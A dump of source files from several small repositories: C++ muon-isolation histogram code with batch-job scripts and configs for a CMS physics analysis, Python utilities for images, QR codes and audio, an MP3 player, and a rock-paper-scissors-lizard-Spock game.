iIsoNoDB = muon.PUPPINoLepIso;\n\t\t}\n\n\t\tTotalIso.push_back(iIso);\n\t\tif(iISO == BinIsoName::ISOPF || iISO == BinIsoName::MiniISO) \n\t\t RelIso.push_back(iIso/muon.pt); \n\t\telse RelIso.push_back(iIso); \n\t\t\n\t\tTotalIsoNoDB.push_back(iIsoNoDB);\n\t\tif(iISO == BinIsoName::ISOPF || iISO == BinIsoName::MiniISO) \n\t\t RelIsoNoDB.push_back(iIsoNoDB/muon.pt);\n\t\telse RelIsoNoDB.push_back(iIsoNoDB);\n\n\t }\n\t \n\t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++){\n\t\t\n\t\t//std::cout 
<< iISO << \" for \"<< RelIsoNoDB.size() << \" value=\" << RelIsoNoDB[iISO] << \" relIsoNoDB and \" << RelIso.size() << \" for RelIso value=\" << RelIso[iISO] << std::endl;\n\t\t\n\t\tHNameRef = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO];\n\n\t\t// Isolation Components\n\t\tm_plots[HNameRef+\"ChHadIso\"]->Fill(ChHadIso[iISO],weight);\n\t\tm_plots[HNameRef+\"NeHadIso\"]->Fill(NeHadIso[iISO],weight);\n\t\tm_plots[HNameRef+\"PhIso\"] ->Fill(PhIso[iISO], weight);\n\t\tm_plots[HNameRef+\"PUIso\"] ->Fill(ChPUIso[iISO], weight);\n\t\t// Isolation Components Vs Vtx\n\t\tm_prof[HNameRef+\"VtxVsChHadIso\"]->Fill(ev.nVtx, ChHadIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsNeHadIso\"]->Fill(ev.nVtx, NeHadIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsPhIso\"] ->Fill(ev.nVtx, PhIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsPUIso\"] ->Fill(ev.nVtx, ChPUIso[iISO], weight);\n\t\t// ---------------------------------------------------------------------------------------\n\t\t// Total Isolation\n\t\tm_plots[HNameRef+\"TotalIso\"] ->Fill(TotalIso[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsTotalIso\"] ->Fill(ev.nVtx, TotalIso[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsTotalIso\"] ->Fill(muon.pt, TotalIso[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsTotalIso\"]->Fill(NGenJets,TotalIso[iISO], weight);\n\t\t// Total Isolation w/o DB corrections\n\t\tm_plots[HNameRef+\"TotalIsoNoDB\"] ->Fill(TotalIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsTotalIsoNoDB\"] ->Fill(ev.nVtx, TotalIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsTotalIsoNoDB\"] ->Fill(muon.pt, TotalIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsTotalIsoNoDB\"]->Fill(NGenJets,TotalIsoNoDB[iISO], weight);\n\t\t// Relative Isolation\n\t\tm_plots[HNameRef+\"RelIso\"] ->Fill(RelIso[iISO], weight);\t\t\n\t\tm_prof[HNameRef+\"VtxVsRelIso\"] ->Fill(ev.nVtx, RelIso[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsRelIso\"] ->Fill(muon.pt, RelIso[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsRelIso\"]->Fill(NGenJets, RelIso[iISO],weight);\n\t\tm_prof[HNameRef+\"dXYVsRelIso\"] ->Fill(dXY, RelIso[iISO], weight);\n\t\tm_prof[HNameRef+\"dZVsRelIso\"] ->Fill(dZ, RelIso[iISO], weight);\n\t\t// Relative Isolation w/o DB corrections\n\t\tm_plots[HNameRef+\"RelIsoNoDB\"] ->Fill(RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"VtxVsRelIsoNoDB\"] ->Fill(ev.nVtx, RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"PtVsRelIsoNoDB\"] ->Fill(muon.pt, RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"NumGenJetsVsRelIsoNoDB\"]->Fill(NGenJets, RelIsoNoDB[iISO],weight);\n\t\tm_prof[HNameRef+\"dXYVsRelIsoNoDB\"] ->Fill(dXY, RelIsoNoDB[iISO], weight);\n\t\tm_prof[HNameRef+\"dZVsRelIsoNoDB\"] ->Fill(dZ, RelIsoNoDB[iISO], weight);\n\n\t\tif(muon.pt > pTeta){\n\t\t m_prof[HNameRef+\"EtaVsTotalIso\"] ->Fill(muon.eta, TotalIso[iISO], weight);\n\t\t m_prof[HNameRef+\"EtaVsTotalIsoNoDB\"]->Fill(muon.eta, TotalIsoNoDB[iISO],weight);\n\t\t m_prof[HNameRef+\"EtaVsRelIso\"] ->Fill(muon.eta, RelIso[iISO], weight);\n\t\t m_prof[HNameRef+\"EtaVsRelIsoNoDB\"] ->Fill(muon.eta, RelIsoNoDB[iISO], weight);\n\t\t}\n\n\t\tint vRelIsoCut = 1 + std::round(RelIso[iISO]*100.);\n\t\tfor (int ibin=vRelIsoCut; ibin<=100; ibin++) m_plots[HNameRef+\"RelIsoCut\"]->AddBinContent(ibin, weight);\n\t\tm_plots[HNameRef+\"RelIsoCut\"]->AddBinContent(101, weight); // Total Number of Muons \n\t\t\n\t\t// -- Isolation WorkingPoints\n\t\tstd::vector<float> iISOwp = iISOwpFromUser[iISO];\n\t\tstd::vector<TString> nISOwp = isowp[iISO];\n\t\t\n\t\tfor(int isocat=0;isocat < 
iISOwp.size();isocat++){\n\t\t \n\t\t if(RelIso[iISO] > iISOwp[isocat]) continue;\n\t\t \n\t\t HNameRef = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO]+nISOwp[isocat];\n\t\t\n\t\t number[HNameRef+\"muons\"]++;\n\t\t\n\t\t m_plots[HNameRef+\"Vtx\"] ->Fill(ev.nVtx, weight);\n\t\t m_plots[HNameRef+\"Pt\"] ->Fill(muon.pt, weight);\n\t\t m_plots[HNameRef+\"NumGenJets\"]->Fill(NGenJets,weight);\n\t\t m_plots[HNameRef+\"dXY\"] ->Fill(dXY, weight);\n\t\t m_plots[HNameRef+\"dZ\"] ->Fill(dZ, weight);\n\t\t \n\t\t if(muon.pt > pTeta) m_plots[HNameRef+\"Eta\"] ->Fill(muon.eta, weight);\n\t\t\n\t\t} // for(IsoCategory)\n\t\t\n\t } // for(Isolation)\n\n\t } // for(pTRegime)\n\n\t } // for(PURegime)\n\t\n\t} // for(etaRegion)\n \n } // for(muonID)\n \n } // if(muon pT eta)\n }// for(Muons)\n \n m_plots[\"NMuons\"]->Fill(number[\"muons\"],weight);\n \n for (unsigned int mid = 0; mid<IDName.size(); mid++)\n for (unsigned int nre = 0; nre<region.size(); nre++)\n for (unsigned int npu = 0; npu<PUr.size(); npu++)\n \tfor (unsigned int npT = 0; npT<pTr.size(); npT++)\t \n \t for(unsigned int iISO=0; iISO < IsoName.size(); iISO++)\n \t for(unsigned int isocat=0; isocat<isowp[iISO].size(); isocat++){\n \t TString iname = IDName[mid]+region[nre]+PUr[npu]+pTr[npT]+IsoName[iISO]+isowp[iISO][isocat]; \n\n \t m_plots[iname+\"NMuons\"]->Fill(number[iname+\"muons\"],weight);\n \t }\n\n \n //}// IF(PV-HP) \n} // void::fill\n \n\n//Functions\n\nvoid muon_pog::print_progress(int TreeEntries, Long64_t ievt){\n if(TreeEntries < 50) TreeEntries = 50;\n int step = TreeEntries/50;\n if (ievt%(step) == 0){ \n float progress=(ievt)/(TreeEntries*1.0);\n int barWidth = 50;\n \n std::cout << \"[\";\n int pos = barWidth * progress;\n \n for (int i = 0; i < barWidth; ++i) {\n if (i < pos) std::cout << \"=\";\n else if (i == pos) std::cout << \">\";\n else std::cout << \" \";\n }\n \n std::cout << \"] \" << int(progress * 100.0) << \" %\\r\";\n std::cout.flush();\n } \n}\n\n\nvoid muon_pog::parseConfig(const std::string configFile, muon_pog::TagAndProbeConfig & tpConfig,\n\t\t\t std::vector<muon_pog::SampleConfig> & sampleConfigs)\n{\n \n boost::property_tree::ptree pt;\n \n try\n {\n boost::property_tree::ini_parser::read_ini(configFile, pt);\n }\n catch (boost::property_tree::ini_parser::ini_parser_error iniParseErr)\n {\n std::cout << \"[TagAndProbeConfig] Can't open : \" << iniParseErr.filename()\n\t\t<< \"\\n\\tin line : \" << iniParseErr.line()\n\t\t<< \"\\n\\thas error :\" << iniParseErr.message()\n\t\t<< std::endl;\n throw std::runtime_error(\"Bad INI parsing\");\n }\n\n for( auto vt : pt )\n {\n if (vt.first.find(\"TagAndProbe\") != std::string::npos)\n\ttpConfig = muon_pog::TagAndProbeConfig(vt);\n else\n\tsampleConfigs.push_back(muon_pog::SampleConfig(vt));\n }\n}\n\nvoid muon_pog::comparisonPlots(std::vector<muon_pog::Plotter> & plotters,\n \t\t\t TFile *outFile, TString & outputDir)\n{\n\n outFile->cd(\"/\");\n \n}\n\nvoid muon_pog::copyPhp(const TString & outputDir)\n{\n \n system(\"cp index.php \" + outputDir);\n \n boost::filesystem::directory_iterator dirIt(outputDir.Data());\n boost::filesystem::directory_iterator dirEnd;\n for (;dirIt != dirEnd; ++ dirIt)\n {\n if (boost::filesystem::is_directory(dirIt->status()))\n\tcopyPhp(TString(dirIt->path().string()));\n }\n\n}\n\nstd::vector<TString> GetListOfFiles(TString FileName){\n std::vector<TString> ListOfSamples;\n std::ifstream InFile;\n InFile.open(FileName);\n if (!InFile){\n std::cout << \"File \" << FileName << \" not found!\" << std::endl;\n 
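// The input list file could not be opened, so there is nothing to run over; stop here.\n 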
std::exit(0);\n }\n else{\n std::string tmpLine;\n while (std::getline(InFile,tmpLine)){\n TString TxtLine = tmpLine;\n if (!TxtLine.Contains(\"#\") && TxtLine.Contains(\".root\")) ListOfSamples.push_back(TxtLine);\n }// while\n }\n \n return ListOfSamples;\n}\n\n// LocalWords: IsoTight\n" }, { "alpha_fraction": 0.5681818127632141, "alphanum_fraction": 0.6257575750350952, "avg_line_length": 26.5, "blob_id": "6293ee42416fa7e7ef84964e27822e8a1bfb6f68", "content_id": "f0ccdfbc2fda2ba4d74cab98639d17a2050efa55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1320, "license_type": "no_license", "max_line_length": 229, "num_lines": 48, "path": "/Tools/efficiencies/SubmitJobs.py", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, time, socket, sys\n\nBaseCMSDir = os.environ[\"CMSSW_BASE\"]+\"/src\"\nOutputName = str(sys.argv[1])\ntqu = \"1nd\"\n#tqu = \"8nh\"\nConfigDir = \"config/config\"\nConfigs = [\n #\"DY\",\n # \"QCD_pT15to20\",\n # \"QCD_pT20to30\",\n # \"QCD_pT30to50\",\n # \"QCD_pT50to80\",\n # \"QCD_pT80to120\",\n # \"QCD_pT120to170\",\n # \"QCD_pT170to300\",\n \"QCD_pT300to470\",\n ## \"QCD_pT470to600\",\n #\"QCD_pT600to800\",\n #\"QCD_pT800to1000\",\n ## \"QCD_pT1000toInf\",\n ]\n\nRunFileName = \"ToSubmit.sh\"\n\nfor cfg in Configs: \n fout = open(RunFileName, \"w\")\n print>>fout, 'export CMSSW_PROJECT_SRC=\"' + BaseCMSDir + '\"'\n print>>fout, \"\"\"\nexport EXE_FILE=\"MuonPOGtreeProducer/Tools/efficiencies/ISOEfficiency.run\"\nexport TOP=\"$PWD\"\ncd $CMSSW_PROJECT_SRC\neval `scramv1 runtime -sh`\ncd $TOP\n\"\"\"\n print>>fout, '$CMSSW_PROJECT_SRC/$EXE_FILE $CMSSW_PROJECT_SRC/MuonPOGtreeProducer/Tools/efficiencies/' + ConfigDir + cfg + '.ini $CMSSW_PROJECT_SRC/MuonPOGtreeProducer/Tools/efficiencies/MuonResults ' + cfg + '_' + OutputName\n \n fout = None\n os.chmod(RunFileName,0744)\n command = 'bsub -R \"pool>300000\" -q ' + tqu + ' -J ' + cfg + ' < ' + RunFileName\n\n print 'Submitting job with command: '\n print str(command)\n os.system( command )\n\n \nos.system( \"rm \" + RunFileName )\n" }, { "alpha_fraction": 0.7037533521652222, "alphanum_fraction": 0.8042895197868347, "avg_line_length": 23.83333396911621, "blob_id": "85c3d977819b6b54082ac630560252f03e4c8bec", "content_id": "4809c7ae64a0c9fac352a085a7f002784e87e099", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 746, "license_type": "no_license", "max_line_length": 169, "num_lines": 30, "path": "/Tools/efficiencies/config/configDY.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nprobe_minPt=5\n\niso_DeltaBeta=0.5\n;PF\niso_LooseWP=0.25\niso_TightWP=0.15\n;PUPPI\nisoPUPPI_LooseWP=0.25\nisoPUPPI_TightWP=0.17\nisoPUPPILep_LooseWP=0.25\nisoPUPPILep_TightWP=0.17\nisoPUPPINoLep_LooseWP=0.25\nisoPUPPINoLep_TightWP=0.17\n;MiniPF\nMiniiso_LooseWP=0.40\nMiniiso_TightWP=0.10\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[DY_SIGNAL] \n;fileName = /eos/cms/store/user/brochero/DYJetsToLL_M-50_TuneCP5_13TeV-amcatnloFXFX-pythia8_RunIISpring18MiniAOD-100X_upgrade2018_realistic_v10.root\nfileName = /afs/cern.ch/user/b/brochero/brochero_WorkArea/MuonPOG/MuonIsolation-100X/CMSSW_10_0_3/src/MuonPOGtreeProducer/Tools/efficiencies/InputLists/Test_DY-100X.list\nQCDWeight = 1.\nnEvents = 100000\napplyReweighting = false\nruns = 0\n\n" }, { "alpha_fraction": 0.7398229837417603, "alphanum_fraction": 
0.7495574951171875, "avg_line_length": 36.66666793823242, "blob_id": "a4d2c4424fbe4086b83af3086186e53964def729", "content_id": "92a91ecd1283eea01f816dafde1ba5a39a3429ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1130, "license_type": "no_license", "max_line_length": 253, "num_lines": 30, "path": "/Tools/efficiencies/README.md", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "# Estimation of ISOLATION efficiencies using the MuonPOG ntuples\n\n# Ntuples production \nThe procedure to produce the ntuples is explained in MuonPOGtreeProducer/README.md.\n\n# Ntuples location\nThe produced ntuples are stored in the ```/eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017``` directory.\n\n# Efficiency estimation\n1. ISOEfficiency.C contains the definitions of all histograms.\n a. Histograms are produced, so far, for all the different IDs (trk, glb, loose, medium, tight, soft and high pT). \n2. To compile:\n```\n./ISOEfficiency\n```\n3. To run ONE job (it runs locally):\n```\n./ISOEfficiency.run config/CONFIG.ini OutputDir OutputFileName\n```\nMuonResults is the default output directory.\n4. In order to run the full set of samples (DY, QCD, ttbar, WJets, etc.) the ```SubmitJobs.py``` macro has been created. To run it, first check the samples in each config file listed in the ```Configs``` variable (line 9). After that, just run\n```\npython SubmitJobs.py OutputFileName\n```\n5. To check the jobs:\n```\nbjobs\n```\nOutputs are saved into ```MuonResults```.\n6. Macros (readme in preparation ;) )\n" }, { "alpha_fraction": 0.6378504633903503, "alphanum_fraction": 0.7780373692512512, "avg_line_length": 19.33333396911621, "blob_id": "d1a816942a8cdb2ff2ce7523c9aed0756bf720b3", "content_id": "6ddfa0a6a89519d757478367bcc19809b59596b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 428, "license_type": "no_license", "max_line_length": 139, "num_lines": 21, "path": "/Tools/efficiencies/config/configQCD_pT50to80.ini", "repo_name": "brochero/MuonPOGtreeProducer", "src_encoding": "UTF-8", "text": "[TagAndProbe]\nmuon_trackType=PF\n;INNER, GLB, TUNEP, PF\n\nprobe_minPt=5\niso_LooseWP=0.25\niso_TightWP=0.15\niso_DeltaBeta=0.5\n\nIDMedium_CutdXY=0.2\nIDMedium_CutdZ=0.5\n\ngen_DrCut=0.10\n\n[QCD_BACKGROUND]\nfileName = /eos/cms/store/group/phys_muon/Commissioning/Ntuples/Commissioning2017/QCD_Pt-50to80_DRPremix-92X_upgrade2017_realistic_v10.root\nQCDWeight = 437504.\n;(19222500*0.02276)\nnEvents = 1000000\napplyReweighting = true\nruns = 0\n\n" } ]
13
drdxxx/myGit_public
https://github.com/drdxxx/myGit_public
a59440522e612f8d8e066cdc897fc4b12e11b422
95423fed6ff9fafc9ba5f421b55723b1cf29c088
0659fc4681cd2700a284e5be426e14db5802f132
refs/heads/master
2022-11-07T09:02:56.294247
2020-06-26T02:54:42
2020-06-26T02:54:42
274,104,285
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5565468072891235, "alphanum_fraction": 0.5634092688560486, "avg_line_length": 29.236515045166016, "blob_id": "5bd8e82021fc1f56a4ae51a913b0ea98c256b928", "content_id": "27e951da79d526c2ddb1aaa5f6fa57c3f1b1221a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8456, "license_type": "no_license", "max_line_length": 79, "num_lines": 241, "path": "/python/MyModules.py", "repo_name": "drdxxx/myGit_public", "src_encoding": "UTF-8", "text": "'''\n时间:2020.6.15\n作者:drd\n'''\n\nimport os\nimport re\nimport imghdr\nimport qrcode\nimport requests\nimport filetype\nimport zipfile\nimport win32com.client as win\nfrom requests import RequestException\nfrom PIL import Image\n\n#从指定url获取html页面内容\ndef get_page(url,headers=None,mode='get'):\n try:\n if mode == 'get':\n response = requests.get(url,headers)\n elif mode == 'post':\n response = requests.post(url,headers)\n if response.status_code == 200:\n return response.text\n else:\n print('请求失败,状态码:%d'%response.status_code)\n return -1\n except RequestException:\n return -1\n\n#对html文本进行正则匹配\ndef parse_page(reg,html):\n pattern = re.compile(reg, re.S)\n items = re.findall(pattern, html)\n if items != []:\n return items\n else:\n print('没有找到符合正则表达式的数据!')\n return None\n\n#将数据写入文件\ndef write_to_file(file_path,content,mode='w',encoding='utf-8'):\n with open(file_path, mode,encoding=encoding)as f:\n f.write(content)\n\n#判断指定图片是否损坏 若图片损坏,则删除,否则返回图片类型\ndef isImageDamage(img_path):\n if imghdr.what(img_path) == None:\n #图片已损坏\n os.remove(img_path)\n print('一张图片损坏,已删除!')\n return None\n else:\n return imghdr.what(img_path)\n\n#从指定的链接地址下载一张图片,下载成功返回1,下载失败返回0;url:图片的链接,img_path:图片保存的位置\ndef get_oneImage(url,img_path):\n try:\n image = requests.get(url)\n with open(img_path, \"wb\") as f:\n f.write(image.content)\n isImageDamage(img_path)\n return 1\n except:\n return 0\n\n#图片格式转换为JPG\n#source_dir:图片文件夹(所有文件必须是图片)或单张图片的位置\n#isDeleteRes:布尔量,是否删除原文件,默认False\ndef other_to_jpg(source_dir,isDeleteRes=False):\n if os.path.isdir(source_dir):\n flist = os.listdir(source_dir)\n for f in flist:\n img = Image.open(source_dir + '\\\\' + f,'r')\n if Image.isImageType(img):\n try:\n img.save((source_dir + '\\\\' + f)[:-4] + '.jpg')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True:os.remove(source_dir + '\\\\' + f)\n except OSError:\n os.remove((source_dir + '\\\\' + f)[:-4] + '.jpg')\n print('convert_to_jpg error:%s'%f)\n else:\n img = Image.open(source_dir,'r')\n try:\n img.save(source_dir[:-4] + '.jpg')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True: os.remove(source_dir)\n except OSError:\n os.remove(source_dir[:-4] + '.jpg')\n print('convert_to_jpg error!')\n\n#图片格式转换为PNG\n#source_dir:图片文件夹(所有文件必须是图片)或单张图片的位置\n#isDeleteRes:布尔量,是否删除原文件,默认False\ndef other_to_png(source_dir,isDeleteRes=False):\n if os.path.isdir(source_dir):\n flist = os.listdir(source_dir)\n for f in flist:\n img = Image.open(source_dir + '\\\\' + f,'r')\n if Image.isImageType(img):\n try:\n img.save((source_dir + '\\\\' + f)[:-4] + '.png')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True:os.remove(source_dir + '\\\\' + f)\n except OSError:\n os.remove((source_dir + '\\\\' + f)[:-4] + '.png')\n print('convert_to_png error:%s'%f)\n else:\n img = Image.open(source_dir,'r')\n try:\n img.save(source_dir[:-4] + '.png')\n if type(isDeleteRes) == bool:\n if isDeleteRes == True: os.remove(source_dir)\n except OSError:\n os.remove(source_dir[:-4] + '.png')\n print('convert_to_png 
error!')\n\n#生成普通二维码\n#target_str:目标数据,可以是url,也可以是文本字符串\n#qrcode_path:二维码图片保存的位置\ndef create_normalQrcode(target_str,qrcode_path):\n qr = qrcode.QRCode(\n version=1,\n error_correction=qrcode.constants.ERROR_CORRECT_L,\n box_size=10,\n border=4,\n )\n qr.add_data(target_str)\n qr.make(fit=True)\n qr_img = qr.make_image(fill_color=\"blue\",back_color=\"white\")\n qr_img.save(qrcode_path)\n\n#生成带图片的二维码\n#target_str:目标数据,可以是url,也可以是文本字符串\n#img_path:二维码中的图片的位置,注意:图片只能是png格式\n#qrcode_path:二维码图片保存的位置\ndef create_withImgQrcode(target_str,img_path,qrcode_path):\n qr = qrcode.QRCode(\n version=2,\n error_correction=qrcode.constants.ERROR_CORRECT_H,\n box_size=10,\n border=1\n )\n qr.add_data(target_str)\n qr.make(fit=True)\n img = qr.make_image()\n img = img.convert(\"RGBA\")\n icon = Image.open(img_path)\n img_w, img_h = img.size\n factor = 4\n size_w = int(img_w / factor)\n size_h = int(img_h / factor)\n icon_w, icon_h = icon.size\n if icon_w > size_w:\n icon_w = size_w\n if icon_h > size_h:\n icon_h = size_h\n icon = icon.resize((icon_w, icon_h), Image.ANTIALIAS)\n w = int((img_w - icon_w) / 2)\n h = int((img_h - icon_h) / 2)\n img.paste(icon, (w, h), icon)\n img.save(qrcode_path)\n\n#读取指定压缩包中的文件,显示压缩包中的文件名,fname:压缩包路径xxx.zip,fileto:文件解压到哪个位置,默认是当前文件夹\ndef readZip(fname,fileto='./'):\n zip = zipfile.ZipFile(fname)\n print('%s压缩包中的文件:'%fname)\n flist = zip.namelist()\n for i in range(len(flist)):\n print(i,':',flist[i])\n t = input('是否解压全部文件到指定目录(y/n/q(表示退出))?')\n if t == 'y':\n #解压所有文件到指定路径\n for f in flist:\n zip.extract(f,fileto)\n elif t == 'q':\n #退出程序\n zip.close()\n return None\n else:\n files = input('请输入要解压的文件路径,以英文逗号隔开:')\n fls = list(files.split(','))\n for f in flist:\n if f in fls:\n zip.extract(f, fileto)\n print('解压完成!')\n zip.close()\n\n#识别文件或文件夹类型(支持文件夹,图像,视频,音频……,不支持wps文件类型:doc(x).xls(x).ppt(x))\n#返回值:‘None’-不能识别的类型,‘dir’-文件夹,其他-可识别类型\ndef identify_type(source_dir):\n if os.path.isdir(source_dir):\n return 'dir'\n else:\n fobj = filetype.guess(source_dir)\n if fobj is None:return None\n else:return fobj.extension\n\n#txt文件内容去重\n#txt_path:txt文件路径\n#encoding:文件字符编码,默认为utf-8\ndef txt_deduplicate(txt_path,encoding='utf-8'):\n if os.path.isfile(txt_path) and txt_path[-4:] == '.txt':\n with open(txt_path, \"r\",encoding=encoding) as f:\n txt_content = f.readlines()\n for i in range(len(txt_content)):\n for j in range(i+1,len(txt_content)):\n if txt_content[i] == txt_content[j]:txt_content[j] = ''\n os.remove(txt_path)\n with open(txt_path, \"a\",encoding=encoding) as f:\n for line in txt_content:\n if line != '':f.write(line)\n else:\n print('找不到指定txt文件!')\n\n#语音播放txt文件的内容\n#txt_path:txt文件路径\n#line:播放哪一行数据,默认为0,表示全部\n#encoding:文件字符编码,默认为utf-8\ndef txt_to_sound(txt_path,line=0,encoding='utf-8'):\n if os.path.isfile(txt_path) and txt_path[-4:] == '.txt':\n with open(txt_path, \"r\", encoding=encoding) as f:\n txt_content = f.readlines()\n if line == 0:\n sound = win.Dispatch('SAPI.SpVoice')\n for text in txt_content:\n sound.Speak(text)\n else:\n sound = win.Dispatch('SAPI.SpVoice')\n for i in range(len(txt_content)):\n if i == line - 1:\n sound.Speak(txt_content[i])\n else:\n print('找不到指定txt文件!')\n\n\n#if __name__ == '__main__':\n # txt_deduplicate('ttt.txt')\n # txt_to_sound(r'ttt.txt',2,'gbk')" }, { "alpha_fraction": 0.47227534651756287, "alphanum_fraction": 0.48661568760871887, "avg_line_length": 32.22222137451172, "blob_id": "cac967c2ed489347fc34b397411f71bf8cce842b", "content_id": "daa1a84b794e0f588a79a3e3ab16d56aeff71d5e", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Python", "length_bytes": 2476, "license_type": "no_license", "max_line_length": 88, "num_lines": 63, "path": "/python/mp3Player.py", "repo_name": "drdxxx/myGit_public", "src_encoding": "UTF-8", "text": "'''\n时间:2020.6.18\n作者:drd\n'''\n\nimport os\nfrom random import choice\nimport win32com.client as win\nfrom playsound import playsound\n\n#播放mp3和wav文件\n#source_dir:音乐文件夹或一首音乐的位置\n#play_mode:播放模式(音乐文件夹),默认按顺序播放\n#play_count:播放多少首音乐,默认为0(play_mode='order'表示播放全部,play_mode='random'表示播放0首)\n#注意:音乐文件名不能包含中文,顺序播放时play_count必须<=(音乐文件名不包含中文且后缀名是.mp3和.wav的文件总数)\ndef mp3_player(source_dir,play_count=0,play_mode='order'):\n if os.path.isdir(source_dir):\n music_list = os.listdir(source_dir)\n if play_mode == 'order':\n mcount =0\n for m in music_list:\n if os.path.isfile(source_dir + '\\\\' + m) and m[-4:] in ('.wav','.mp3'):\n try:\n print('正在播放音乐:', m)\n playsound(source_dir + '\\\\' + m)\n mcount += 1\n except:\n print('音乐播放失败:',m)\n continue\n if mcount == play_count:\n break\n\n elif play_mode == 'random':\n is_stop = 0\n while is_stop != play_count:\n m = choice(music_list)\n if os.path.isfile(source_dir + '\\\\' + m) and m[-4:] in ('.wav', '.mp3'):\n try:\n print('正在播放音乐:', m)\n playsound(source_dir + '\\\\' + m)\n is_stop += 1\n except:\n print('音乐播放失败:', m)\n else:\n if source_dir[-4:] in ('.wav', '.mp3'):\n try:\n print('正在播放音乐:', os.path.basename(source_dir))\n playsound(source_dir)\n except:\n print('音乐播放失败:', os.path.basename(source_dir))\n\n\nif __name__ == '__main__':\n # 将文本转为语音并播放\n mpath = input('请输入音乐文件夹或音乐的路径:')\n list = mpath.split('\\\\')\n mpath = list[0]\n for i in range(1,len(list)):mpath =mpath + '\\\\\\\\' + list[i]\n text = '将要播放的音乐来源是:' + os.path.basename(mpath)\n print('音乐文件/文件夹路径:',mpath)\n sound = win.Dispatch('SAPI.SpVoice')\n sound.Speak(text)\n mp3_player(mpath,10,'random')" } ]
2
jandersson/Coursera_IIPP
https://github.com/jandersson/Coursera_IIPP
5b2e22dfd940538f222f39ea16bd3398f57088af
e381c7f8d7f36adf687c85829afff5acae100e9f
1bc8b1dd4ac53cdc3fc5df019f6115581f6bcff1
refs/heads/master
2021-01-10T08:54:14.076997
2015-06-05T20:55:40
2015-06-05T20:55:40
36,568,236
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5600558519363403, "alphanum_fraction": 0.5761173367500305, "avg_line_length": 20.37313461303711, "blob_id": "6570d8c5628c371f94143a29d85ef539c3fd4cb8", "content_id": "da86d4b5715455e91b94cea3c100aab75201a52e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1432, "license_type": "no_license", "max_line_length": 54, "num_lines": 67, "path": "/rpsls/RPSLS.py", "repo_name": "jandersson/Coursera_IIPP", "src_encoding": "UTF-8", "text": "__author__ = 'Jonas'\n##Assignment 1\n\n##Name to number assignments\n#0 rock\n#1 Spock\n#2 paper\n#3 lizard\n#4 scissors\n\nimport random\n\ndef name_to_number(name):\n '''\n Takes a name and returns a corresponding number\n '''\n if name == 'rock':\n return 0\n if name == 'Spock':\n return 1\n if name == 'paper':\n return 2\n if name == 'lizard':\n return 3\n if name == 'scissors':\n return 4\n else:\n print 'Thats an invalid choice!'\n\ndef number_to_name(number):\n '''\n Takes a number and returns its corresponding name.\n '''\n if number == 0:\n return 'rock'\n elif number == 1:\n return 'Spock'\n elif number == 2:\n return 'paper'\n elif number == 3:\n return 'lizard'\n elif number == 4:\n return 'scissors'\n else:\n print 'Invalid number!'\n\ndef rpsls(player_choice):\n print \"\\nPlayer chooses\", player_choice\n player_number = name_to_number(player_choice)\n comp_number = random.randrange(0,5)\n comp_name = number_to_name(comp_number)\n print \"Computer chooses\", comp_name\n diff = (player_number - comp_number) % 5\n if diff == 0:\n print 'Player and computer tie!'\n elif diff == 1:\n print 'Player wins!'\n elif diff == 2:\n print 'Player wins!'\n elif diff > 2:\n print 'Computer wins!'\n\nrpsls('rock')\nrpsls('Spock')\nrpsls('paper')\nrpsls('lizard')\nrpsls('scissors')\n" }, { "alpha_fraction": 0.8484848737716675, "alphanum_fraction": 0.8484848737716675, "avg_line_length": 32, "blob_id": "d0ca5059a9e029e9674e22ea13970df9099017c0", "content_id": "0274736c7f28f37d4a161a79490d541ea44c39d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 66, "license_type": "no_license", "max_line_length": 49, "num_lines": 2, "path": "/README.md", "repo_name": "jandersson/Coursera_IIPP", "src_encoding": "UTF-8", "text": "# Coursera_IIPP\nIntroduction to Interactive Programming in Python\n" } ]
2
Keerthanalaxmi/Pythonbasics
https://github.com/Keerthanalaxmi/Pythonbasics
76afaca8a3efa34ac4e057b8c67fd70d96a92fcf
e2f6ff946066b3d55a9bda86f46dbc1d51e74c1d
e9bf2b0406a31afeee02d98113e5f5fe70390189
refs/heads/master
2020-04-30T20:33:19.198469
2019-06-01T08:01:27
2019-06-01T08:01:27
177,070,120
0
0
null
null
null
null
null
